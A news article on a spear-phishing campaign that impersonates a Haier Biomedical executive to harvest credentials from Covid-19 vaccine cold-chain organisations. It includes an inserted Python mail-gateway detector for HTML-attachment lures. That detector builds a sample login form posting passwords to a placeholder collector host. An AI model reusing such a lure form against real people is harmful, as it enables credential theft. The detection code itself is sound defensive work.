Elements of the international vaccine supply chain are being targeted by a worldwide phishing campaign that is probably the work of a nation state-backed cyber attacker, according to IBM Security’s X-Force unit.
This development comes hot on the heels of a global alert issued by Interpol to its 194 member states, warning that malicious actors were tooling up to target organisations associated with Covid-19 vaccines.
The ongoing campaign is targeting organisations closely associated with the cold chain – part of the vaccine supply chain that ensures the safe preservation of vaccines in temperature-controlled environments during transit.
The cold chain will be critical for the deployment of two of the most promising Covid-19 vaccines, that developed by Pfizer/BioNTech, which needs to be kept at -70°C, and that developed by Moderna, which needs to be kept at -20°C.
The X-Force team said its analysis pointed to a “calculated operation” starting in September, spanning six countries and targeting organisations associated with international vaccine alliance Gavi’s Cold Chain Equipment Optimisation Platform (CCEOP).
It was unable to precisely attribute the campaign, but said that the precision targeting of key executives at relevant organisations bore the “potential hallmarks of nation-state tradecraft”.
IBM senior strategic cyber threat analyst Claire Zaboeva wrote: “While attribution is currently unknown, the precision targeting and nature of the specific targeted organisations potentially point to nation-state activity.
“Without a clear path to a cash-out, cyber criminals are unlikely to devote the time and resources required to execute such a calculated operation with so many interlinked and globally distributed targets. Likewise, insight into the transport of a vaccine may present a hot black-market commodity. However, advanced insight into the purchase and movement of a vaccine that can impact life and the global economy is likely to be a high-value and high-priority nation-state target.”
According to IBM X-Force, the attacker has been impersonating an executive at Haier Biomedical, a cold chain specialist, to target organisations including the European Commission’s Directorate General for Taxation and Customs Union, and companies in the energy, manufacturing, website creation and software and internet security sectors.
The spear-phishing emails targeted, in the main, executives in sales, procurement, IT and finance departments, but in some instances people in other parts of the organisation, too.
The subject lines are requests for quotations related to the CCEOP programme, but the emails instead contain malicious HTML attachments that open locally, prompting their victims to enter their credentials in order to view the file.
Their aim is almost certainly to harvest credentials, and so gain future access to corporate networks and data on vaccine distribution processes, methods and plans, such as information on how governments will get the Covid-19 vaccine into the hands of national health services.
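The lure described above, an HTML attachment that opens locally and asks the recipient to sign in before the "document" is shown, can be flagged at the mail gateway before it reaches an inbox. The following is an added example, not code from IBM X-Force or from the article: it parses a message, pulls out HTML attachments and reports any that embed a password form, especially one that posts to an external URL. The sample message, sender and collector address are constructed placeholders.

```python
# Added example: flag e-mails whose HTML attachment carries a credential-harvesting form.
import email
import re
from email import policy
from email.message import EmailMessage

PASSWORD_INPUT = re.compile(r"<input[^>]*type\s*=\s*['\"]?password", re.I)
FORM_TAG = re.compile(r"<form\b", re.I)
REMOTE_POST = re.compile(r"<form[^>]*action\s*=\s*['\"]?https?://", re.I)


def html_attachments(msg):
    """Yield (filename, decoded HTML) for every attached HTML part of a parsed message."""
    for part in msg.walk():
        if part.get_content_maintype() == "multipart":
            continue
        name = part.get_filename() or ""
        is_html_attachment = (part.get_content_type() == "text/html"
                              and part.get_content_disposition() == "attachment")
        if is_html_attachment or name.lower().endswith((".html", ".htm")):
            payload = part.get_payload(decode=True) or b""
            yield name, payload.decode(part.get_content_charset() or "utf-8", errors="replace")


def assess(raw):
    """Return a list of findings for one raw RFC 822 message (bytes); empty list if clean."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for name, html in html_attachments(msg):
        reasons = []
        if FORM_TAG.search(html) and PASSWORD_INPUT.search(html):
            reasons.append("password form in local HTML attachment")
        if REMOTE_POST.search(html):
            reasons.append("form posts to external URL")
        if reasons:
            findings.append({"attachment": name, "subject": str(msg["subject"]), "reasons": reasons})
    return findings


def build_sample():
    """Constructed lure in the shape the article describes: RFQ subject, HTML attachment with a login form."""
    m = EmailMessage()
    m["From"] = "procurement@example.invalid"   # placeholder sender, not a real address
    m["To"] = "sales@example.invalid"
    m["Subject"] = "Request for Quotation - CCEOP cold chain equipment"
    m.set_content("Please open the attached RFQ to view the requirements.")
    html = ('<html><body><form action="https://collector.example.invalid/post" method="post">'
            'Sign in to view the document<br><input name="user">'
            '<input name="pass" type="password"><input type="submit"></form></body></html>')
    m.add_attachment(html, subtype="html", filename="RFQ_CCEOP.html")
    return m.as_bytes()
```

A gateway rule built on `assess()` would quarantine or rewrite the attachment; a clean message with no HTML attachment yields no findings.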
Max Heinemeyer, director of threat hunting at Darktrace, said attacking the vaccine supply chain was likely to be easier for the perpetrators than going after the core targets in the healthcare sector.
“This particular effort to disrupt vaccine research and development confirms that the barrier between the ‘cyber’ and ‘physical’ supply chains has all but dissolved,” he said. “Attacks today can start in the inbox and end up disrupting the delivery chain of a critical vaccine or service.
“A single phishing attack is easy to conduct, but executing an orchestrated spear-phishing campaign against high-profile targets like this shows a lot of sophistication. The attack appears broad and sophisticated – broader than typical cyber crime campaigns that aim for quick monetisation.”
Although the goals of the campaign are, at this stage, merely speculation, Heinemeyer suggested that information about the physical whereabouts of vaccines that need to be kept extremely cold could be useful data for many nation states.
The fact that the campaign has been going on for some time is also a concern, he added. “Organisations need to get much better at detecting unusual digital activity at a far earlier stage, using cutting-edge defence technology – particularly artificial intelligence – across the entirety of their digital infrastructure,” he said.
Maria Namestnikova, head of Kaspersky’s Global Research and Analysis Team (GReAT) in Russia, said: “Threat actors are continuing to pivot and exploit the Covid-19 pandemic to carry out highly advanced cyber attacks with this latest attack on the Covid-19 vaccine. Recently, Kaspersky and several other cyber security companies have noted a growing interest on the part of APT threat actors in vaccine developments.
“During the first six months of research on a Covid-19 vaccine, there were only messages from Western intelligence agencies on the WellMess attacks against drug developers. Now, in just the past few weeks, the cyber security community has reported attempts to compromise researchers in the US, South Korea, Canada, France and India.
“Some of this activity is reported to have been linked to North Korean actors. In general, we believe that interest from APT actors in vaccine development will continue to grow, and that these attacks will be leveraged as part of a geopolitical strategy. Thus, false flags, for example, email addresses with a .ru domain – a technique already used by some threat actors – may be used to try to deflect suspicion from the attackers, leading to potential geopolitical disputes.”
IBM’s Zaboeva added: “IBM Security X-Force urges companies in the Covid-19 supply chain – from research of therapies, healthcare delivery to distribution of a vaccine – to be vigilant and remain on high alert during this time.
“Governments have already warned that foreign entities are likely to attempt to conduct cyber espionage to steal information about vaccines. Today, in conjunction with this blog, DHS CISA is issuing an alert encouraging organisations associated with the storage and transport of a vaccine to review this research and recommended best practices to remain vigilant.”